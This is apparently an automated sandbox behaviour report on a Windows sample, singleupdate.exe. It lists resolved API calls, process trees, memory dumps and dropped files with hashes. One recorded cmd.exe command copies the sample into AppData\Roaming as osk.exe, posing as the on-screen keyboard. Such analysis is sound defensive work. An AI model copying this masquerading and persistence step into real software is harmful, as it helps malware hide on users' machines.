Get Address	c:\windows\syswow64\kernel32.dll	function = TerminateProcess, address_out = 0x75ea67e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SizeofResource, address_out = 0x75ea6740	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileTime, address_out = 0x75eff140	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFilePointer, address_out = 0x75eff120	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetFileAttributesW, address_out = 0x75eff100	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetEndOfFile, address_out = 0x75eff0e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = ReadFile, address_out = 0x75eff090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenProcess, address_out = 0x75ea5cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = OpenMutexA, address_out = 0x75ede030	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = MoveFileW, address_out = 0x75ede500	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LockResource, address_out = 0x75ea5bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadResource, address_out = 0x75ea5b00	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LoadLibraryA, address_out = 0x75ea5a80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = LeaveCriticalSection, address_out = 0x77bfb250	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = InitializeCriticalSection, address_out = 0x77c0af20	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalUnlock, address_out = 0x75ee44e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalReAlloc, address_out = 0x75ee3f90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalHandle, address_out = 0x75ee4420	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalLock, address_out = 0x75ee42f0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalFree, address_out = 0x75ea1ee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GlobalAlloc, address_out = 0x75ea5750	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetVersionExA, address_out = 0x75ea56d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetModuleFileNameW, address_out = 0x75ea5090	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLocalTime, address_out = 0x75ea5060	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetLastError, address_out = 0x75ea5010	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetFileAttributesA, address_out = 0x75efeee0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetEnvironmentVariableA, address_out = 0x75ea4f90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceA, address_out = 0x75efee80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDateFormatA, address_out = 0x75ea76e0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCommandLineW, address_out = 0x75ea4cc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetCPInfo, address_out = 0x75ea4d10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FreeResource, address_out = 0x75ea4c80	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FormatMessageA, address_out = 0x75ea4bc0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindResourceA, address_out = 0x75ee27c0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindNextFileW, address_out = 0x75efee40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FindFirstFileW, address_out = 0x75efedf0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToLocalFileTime, address_out = 0x75efed60	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = FileTimeToDosDateTime, address_out = 0x75ee1eb0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnumCalendarInfoA, address_out = 0x75ebc0d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = EnterCriticalSection, address_out = 0x77bfb2d0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteFileW, address_out = 0x75efed40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = DeleteCriticalSection, address_out = 0x77bdfb90	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessW, address_out = 0x75ea4610	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateProcessA, address_out = 0x75ea45b0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreatePipe, address_out = 0x75ea4590	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateMutexA, address_out = 0x75efeb40	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CreateFileW, address_out = 0x75efed10	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CompareStringA, address_out = 0x75ea4410	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CloseHandle, address_out = 0x75efeab0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegSetValueExA, address_out = 0x761cffc0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumValueA, address_out = 0x761d1940	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegEnumKeyExA, address_out = 0x761d1960	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteValueA, address_out = 0x761d07a0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegDeleteKeyA, address_out = 0x761cf8c0	1	Fn
Get Address	c:\windows\syswow64\advapi32.dll	function = RegCreateKeyExA, address_out = 0x761cf560	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetReadFile, address_out = 0x73443a70	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenUrlA, address_out = 0x7350e8c0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetOpenA, address_out = 0x7342f1a0	1	Fn
Get Address	c:\windows\syswow64\wininet.dll	function = InternetCloseHandle, address_out = 0x7341d000	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteW, address_out = 0x765e42e0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetSpecialFolderLocation, address_out = 0x765e3790	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetPathFromIDListW, address_out = 0x7658bda0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = SHGetMalloc, address_out = 0x765edf80	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayPtrOfIndex, address_out = 0x75bd6670	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetUBound, address_out = 0x75bd5460	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayGetLBound, address_out = 0x75bd5ea0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = SafeArrayCreate, address_out = 0x75bd0340	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantChangeType, address_out = 0x75bca5e0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantCopy, address_out = 0x75be9dc0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantClear, address_out = 0x75be9db0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantInit, address_out = 0x75be9de0	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = GetDiskFreeSpaceExA, address_out = 0x75efee90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VariantChangeTypeEx, address_out = 0x75bca610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNeg, address_out = 0x75c152c0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarNot, address_out = 0x75c16560	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAdd, address_out = 0x75bed610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarSub, address_out = 0x75bee3e0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMul, address_out = 0x75bedb10	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDiv, address_out = 0x75c15800	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarIdiv, address_out = 0x75c161a0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarMod, address_out = 0x75c16400	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarAnd, address_out = 0x75be3200	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarOr, address_out = 0x75c16610	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarXor, address_out = 0x75c167b0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCmp, address_out = 0x75bd60b0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarI4FromStr, address_out = 0x75bd6ec0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR4FromStr, address_out = 0x75be3010	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarR8FromStr, address_out = 0x75be3630	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarDateFromStr, address_out = 0x75bd8b90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarCyFromStr, address_out = 0x75bc2d90	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBoolFromStr, address_out = 0x75bd48f0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromCy, address_out = 0x75bd7f50	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromDate, address_out = 0x75bd89c0	1	Fn
Get Address	c:\windows\syswow64\oleaut32.dll	function = VarBstrFromBool, address_out = 0x75bd48a0	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READONLY, maximum_size = 0	249	Fn
Map	-	process_name = c:\users\fd1hvy\desktop\singleupdate.exe, desired_access = FILE_MAP_READ	249	Fn

Driver (1)

Operation	Driver	Additional Information	Success	Count	Logfile
Control	System Paging File	control_code = 0x900c0		1	Fn

Window (1)

Operation	Window Name	Additional Information	Success	Count	Logfile
Create	-	class_name = SysTreeView32, wndproc_parameter = 0		1	Fn

Keyboard (1)

Operation	Additional Information	Success	Count	Logfile
Get Info	type = 0, result_out = 4		1	Fn

System (1100)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = NQDPDE, type = ComputerNamePhysicalNetBIOS	249	Fn
Get Cursor	x_out = 1334, y_out = 612	847	Fn
Get Time	type = Local Time, time = 2019-04-12 11:17:22 (Local Time)	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:17:44 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 21171410346	1	Fn
Get Info	type = Operating System	1	Fn

Environment (3)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	-		2	Fn Data
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe		1	Fn

Process #6: cmd.exe

Information	Value
ID	#6
File Name	c:\windows\syswow64\cmd.exe
Command Line	"C:\WINDOWS\system32\cmd.exe" /c copy /y "C:\Users\FD1HVy\Desktop\singleupdate.exe" "C:\Users\FD1HVy\AppData\Roaming\osk.exe"
Initial Working Directory	C:\WINDOWS\system32\
Monitor	Start Time: 00:03:28, Reason: Child Process
Unmonitor	End Time: 00:03:31, Reason: Self Terminated
Monitor Duration	00:00:02

OS Process Information

Information	Value
PID	0xfb4
Parent PID	0xe64 (c:\users\fd1hvy\desktop\singleupdate.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x F1C 0x 174

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
cmd.exe	0x00C00000	0x00C58FFF	Process Termination	-	32-bit	-			... Region Actions Download Dump

Host Behavior

File (27)

Operation	Filename	Additional Information	Count	Logfile
Create	C:\Users\FD1HVy\Desktop\singleupdate.exe	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE	1	Fn
Get Info	C:\WINDOWS\system32	type = file_attributes	1	Fn
Get Info	C:\Windows\System32	type = file_attributes	1	Fn
Get Info	C:\Users\FD1HVy\Desktop\singleupdate.exe	type = file_attributes	1	Fn
Get Info	-	type = file_type	1	Fn
Get Info	C:\Users\FD1HVy\AppData\Roaming\osk.exe	type = file_attributes	2	Fn
Get Info	C:\Users\FD1HVy\AppData\Roaming\osk.exe	type = file_attributes	1	Fn
Get Info	STD_OUTPUT_HANDLE	type = file_type	1	Fn
Open	STD_OUTPUT_HANDLE	-	9	Fn
Open	STD_INPUT_HANDLE	-	4	Fn
Open	-	-	2	Fn
Copy	C:\Users\FD1HVy\AppData\Roaming\osk.exe	source_filename = C:\Users\FD1HVy\Desktop\singleupdate.exe	1	Fn
Read	-	size = 512, size_out = 512	1	Fn Data
Write	STD_OUTPUT_HANDLE	size = 27	1	Fn Data

Registry (17)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 0, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor	value_name = AutoRun, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DisableUNCCheck, data = 64, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DelayedExpansion, data = 1, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Command Processor	value_name = AutoRun, data = 9, type = REG_NONE	1	Fn

Process (1)

Operation	Process	Additional Information	Success	Count	Logfile
Get Info	c:\windows\syswow64\cmd.exe	type = PROCESS_PAGE_PRIORITY		1	Fn

Module (8)

Operation	Module	Additional Information	Count	Logfile
Get Handle	c:\windows\syswow64\cmd.exe	base_address = 0xc00000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	2	Fn
Get Filename	-	process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\WINDOWS\SysWOW64\cmd.exe, size = 32743	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetThreadUILanguage, address_out = 0x75ea4f70	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = CopyFileExW, address_out = 0x75ea4330	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = IsDebuggerPresent, address_out = 0x75ea5930	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = SetConsoleInputExeNameW, address_out = 0x74fe09d0	1	Fn

Environment (11)

Operation	Additional Information	Count	Logfile
Get Environment String	-	4	Fn Data
Get Environment String	name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Users\FD1HVy\AppData\Local\Microsoft\WindowsApps	1	Fn
Get Environment String	name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC	1	Fn
Get Environment String	name = PROMPT	1	Fn
Get Environment String	name = COMSPEC, result_out = C:\WINDOWS\system32\cmd.exe	1	Fn
Get Environment String	name = KEYS	1	Fn
Set Environment String	name = PROMPT, value = $P$G	1	Fn
Set Environment String	name = =C:, value = C:\Windows\System32	1	Fn

Process #8: osk.exe

4998

Information	Value
ID	#8
File Name	c:\users\fd1hvy\appdata\roaming\osk.exe
Command Line	"C:\Users\FD1HVy\AppData\Roaming\osk.exe"
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:03:32, Reason: Child Process
Unmonitor	End Time: 00:04:47, Reason: Self Terminated
Monitor Duration	00:01:14

OS Process Information

Information	Value
PID	0x6cc
Parent PID	0xe64 (c:\users\fd1hvy\desktop\singleupdate.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x DF4 0x FD4 0x 714 0x A8C 0x 840 0x 8AC 0x F74 0x F84

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
osk.exe	0x00400000	0x004BFFFF	Marked Writable	-	32-bit	-	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00401110	... Region Actions Download Dump Go to AV Match
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0040EB38, 0x0040F130	... Region Actions Download Dump Go to AV Match
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0040B764	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00417D3C	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00410838	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00413074	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0042A5C8	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0042B67C, 0x0042CC58	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00423564, 0x00429864	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00414000	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00420000, 0x0041FA70, ...	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00415904	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00416000	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00426B84	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x0041C000, 0x0041B1F8	... Region Actions Download Dump
osk.exe	0x00400000	0x004BFFFF	Content Changed	-	32-bit	0x00428BB0	... Region Actions Download Dump

Dropped Files

Filename	File Size	Hash Values	Actions
C:\BOOTNXT	0.20 KB	MD5: 627ac254b46ce3aefd14b0a57cd49a4f SHA1: f2f70a38f49bd0d859069665bb5ed971355f452f SHA256: cf5a8369639937456fbf26fb33b49aba64d57b302865eff6e9087b0123ec1d92 SSDeep: 6:gkGq+5VK/pRX0UXejWmXhcBCsKWiumTTQUSUWQR1/:aVcpRX08qWmSGZSPQR1	... File Actions Show Properties Download
C:\BOOTSECT.BAK	8.20 KB	MD5: 5d8cb0702ca7353571ab889226187b8f SHA1: 43bcbc2e350b5798bbb1d0a54772706fa9422a62 SHA256: 500cf654a12e8e16fe26e3d2ddb71d3ea8cbf70cf6827b02a931a0a3dfc12075 SSDeep: 96:c202UiHGSZnV6nPt4ihC/U8remKrQUqjfyJB7y4AIwVoouPd:Q2UgsPt4ihCvresUDBm4lwVs	... File Actions Show Properties Download
C:\588bce7c90097ed212\DHtmlHeader.html	15.94 KB	MD5: 53680ca733f50dfb0b9a5da92f056063 SHA1: 5374c7fee71d7f1818bd5748162af931c45ef1d4 SHA256: dc3d30c2286a50bdbacebfdd03a5985e3f7321fd9ed3126d714d12577881ddcf SSDeep: 192:aortF+y1x3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjU6:RZF+csOT01KcBUFJFEWUxFzvHz	... File Actions Show Properties Download
C:\588bce7c90097ed212\DisplayIcon.ico	86.67 KB	MD5: db71dcc85a68f2ee1c176dbe3bccf7e1 SHA1: 3ab8627170b7b1f83fe8376c1b92c7bceb062ede SHA256: f96935dead2c5b2545dccc8aa94abaae0eccd9bac61ce900a7d5b8bfcb1e1fa5 SSDeep: 1536:FWayqxMQP8ZOs0JOG5UGd8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdG:i/gB4u8vo2no0/aX7C7DcI	... File Actions Show Properties Download
C:\588bce7c90097ed212\header.bmp	3.74 KB	MD5: 2af340298aa27c7511eaad4c566d10a7 SHA1: bb792d35432656ff7d64cc62b364e03c8b6b33cf SHA256: 1042e3dd42f9869bc7ee324c59085024285d4040981487106203d05d1c58e7a7 SSDeep: 48:kqG1kwXXb8vkiBaB1DdJeHnMOccFpscGqfkemvIQpQK/xHiggTfGRgVC0z2zY:APXXYvbEXdJEnrJmdQ+EgyfGkkY	... File Actions Show Properties Download
C:\588bce7c90097ed212\netfx_Core_x64.msi	1.81 MB	MD5: d3ed2365b416d455ff62e72764ce9602 SHA1: a1dc939149e89b1bd5f3447b9bb565f23a38da5f SHA256: be6582e7d1cd73d55e382b185012255fe604ec4b1de1f37ec45fda01c10d215e SSDeep: 24576://dm64sNnQpcAmQvPbkb99rOFfnJisBY6VahWoNoLfjT10MuPxxWP:g64mQpc269sZJVG6fgoLLTj	... File Actions Show Properties Download
C:\588bce7c90097ed212\netfx_Core_x86.msi	1.11 MB	MD5: 3013c3fdd29aa5f8e88fac6af5af8b98 SHA1: 3e665b608c8417031257017cb7853a72efaf264f SHA256: 671ff33fff82e33e5d920b4c87014029fa3e6b32817abf514a1e8e56ede10c80 SSDeep: 24576:1f6szxVX6d9NLQXcyUbPB9b7odfHhIxkP:1fhzx56dPQXcRT0vv	... File Actions Show Properties Download
C:\588bce7c90097ed212\netfx_Extended_x64.msi	852.40 KB	MD5: 8697ed3589861988334f60a722b5a1e9 SHA1: e905e28fe4a6315d2fa1bcefcf4de571908b2d1b SHA256: 4f6e013f6c5c1a0649e1c4d89918943624d9eda5f46d816f40c0dcd67fe289a7 SSDeep: 24576:1rDsx6IoNUQlcmzSpOhSCKiPOQ6/QBkkkkkNSlG:Vk6IVQlccEv2764KSA	... File Actions Show Properties Download
C:\588bce7c90097ed212\netfx_Extended_x86.msi	484.31 KB	MD5: 3558c5a1de8eaf0350f7307f90cc2e8c SHA1: 9dc338934a2ae7f263598f58aee8ff29d84380b3 SHA256: 05cc65bd6f58af3cd3ef3c346b5f609f92ef32733f256a04135d39c37dce02f6 SSDeep: 6144:b+tHfepsrxgrGL/JD6sAkiOk05c+Q+MjUrsLQUIcmZSOV0+lOjKm6FBQ0ssi5Hp:oHfepsrxAGt6s2sN1SQXcmZJV0jO8J	... File Actions Show Properties Download
C:\588bce7c90097ed212\ParameterInfo.xml	265.93 KB	MD5: 1c1aa2e250f0ba1913a2d859ad14fa14 SHA1: 4ff84157cdca386654e1091727946abf98bc4fef SHA256: 779943c5a32a9aa0633a6d0374155fa8f428ee4ec3ce473e8b68cc4240f00a54 SSDeep: 768:5uFROYoVQTLTQTD9Mh8HLPsdnOLaEvbc6PcbrI2:5uFRJovNHLPEOLaC+I2	... File Actions Show Properties Download
C:\588bce7c90097ed212\RGB9RAST_x64.msi	180.74 KB	MD5: 2739878fd35dfdd1858bc4a5289ebf02 SHA1: fcb603cb00e0929c221edb82338de20672e1da1b SHA256: ecdbac9aff8bb1da1efc5d33f121ca0da4ca0f4285c408cf89af17b0eda848f3 SSDeep: 3072:vMZbdgC73Q5H0Un0lHG9A7KYve3Hg5BsziBUVQzB7m0rg47aEqPNWZKq5uXp0F:vMddgq38rA7KV3Hg5CziBuE9rgVEqiB7	... File Actions Show Properties Download
C:\588bce7c90097ed212\RGB9Rast_x86.msi	92.71 KB	MD5: 175f4ce3b0384881c32bc77b0978ba32 SHA1: fb4051735baa869945fcf2e99f8f4dc2eb16e173 SHA256: b051d7b0d4747f26d85dd1d62e76c6b89396420580d913dffa9f3bc4a5f30763 SSDeep: 1536:OpZdWM41picgCjX3QAoHwDHL0fWi0lrmsIjyGWeHApNR3YHaeAHaeeeB:OgZbdgC73Q5H0Un0li+GTsxqQB	... File Actions Show Properties Download
C:\588bce7c90097ed212\SetupUi.xsd	29.61 KB	MD5: 0fd177f40e7ae78e97bced3721c9bf04 SHA1: a24a6710721cb5d6b62d0b96cee0f1398ad47e81 SHA256: 494d942cc68e22363bfd460e7dd40f4c46389eba359eb1868042a06d233c4f71 SSDeep: 768:WfcLm8eYhsPs05F8/ET/chT+cxcW8G2P4oeTMZ:XwchT+cxcDd	... File Actions Show Properties Download
C:\588bce7c90097ed212\SplashScreen.bmp	40.32 KB	MD5: e99d54121217f27aad1a5b7bd81b6d5d SHA1: 61d0deb786d85cfea5556d4d2221a49287c97bd1 SHA256: 13a7999d032eca47bf23f31f4d46bd05ac16d71ecda27e4ce25150f821662a32 SSDeep: 384:FrJo2kgxmJGEsU3pP28+Qq1ms68/tUqHUlHGwM7bwv3ETbFrLq:FrJkpoapTbimsqHGc	... File Actions Show Properties Download
C:\588bce7c90097ed212\Strings.xml	13.95 KB	MD5: 68369dac8a380c0cf20a527b9e93936c SHA1: bd03a183faa4c4fc6c24865870ac241b80378ec6 SHA256: de76b91850fce2bbdbc0129eea747094dc9c263d1b6f99671a4badc0b356949c SSDeep: 384:7Mqi4ZZo71GHY3vqaqMnYfHHVXIHjfBHwnwXCa+h:7bi4Zt	... File Actions Show Properties Download
C:\588bce7c90097ed212\UiInfo.xml	38.19 KB	MD5: 9872bc6dde5031daa48f7fd5e73115b4 SHA1: 3a2bc1a671a5a36e25ed990d91baf5701326b137 SHA256: 4a0eda9de70df073a8dbbc4f96ce1e0c6c6d54deae0f76969457c0d6602392d9 SSDeep: 768:h5sE4UR0d5vssgP7ZgZ/vSguJQvFQXvDINJh6Fmhvk71sO0Nep3UL9Eu+dOtOcO7:N4UR0d5vsTPuZXQYQLIN/6Fmhvk71sOZ	... File Actions Show Properties Download
C:\588bce7c90097ed212\watermark.bmp	101.85 KB	MD5: b538f8af9c4b49408040ba385c55f92a SHA1: 40ba806e1a30b67940f2441fde26f98bc715a59e SHA256: f28bb9241eefec2abf9dabbf94be0f64d6d299cea1b84447f68a69e5931c4520 SSDeep: 768:0VKUpOeBmAj72KbvEvffvCv7cTIMUHuRzHA8X9L91T9ho4xw7Cgt1:sKULmAfbvEv47cIHzE9Xo4Suo1	... File Actions Show Properties Download
C:\588bce7c90097ed212\1025\eula.rtf	7.59 KB	MD5: 2159e916c587208ebe03a866dcfb9d65 SHA1: e94a706cb1930cf81f18f1c3228e4ad5f243ddc1 SHA256: f3df2eca3f7f62cf18b51f42b415407e2fa4fca7e9f711613bb8a450f7e7771d SSDeep: 192:rUl3Tk4pQxL75CD7sH08JUXthIT2M+bOx7BnT7QUmRn:rUpQ4pQxL7YsH08JUXQT2M+s7BnT7QUq	... File Actions Show Properties Download
C:\588bce7c90097ed212\1025\LocalizedData.xml	72.69 KB	MD5: e2f3b021d15fbae08485184685111d58 SHA1: c6631f5183ad3d423d35fef1da59a1e6bbc61780 SHA256: b12281d34c272a194f4d6db8a8526f776ffae6fbfea9e5184b36b8ae18e3132d SSDeep: 384:jlQXhDxsSsxGMZzhKtQOsitz04PosyQBijTJ3ejrwddc:uXhDxsnxGMdARPLzBijTJ3eHV	... File Actions Show Properties Download
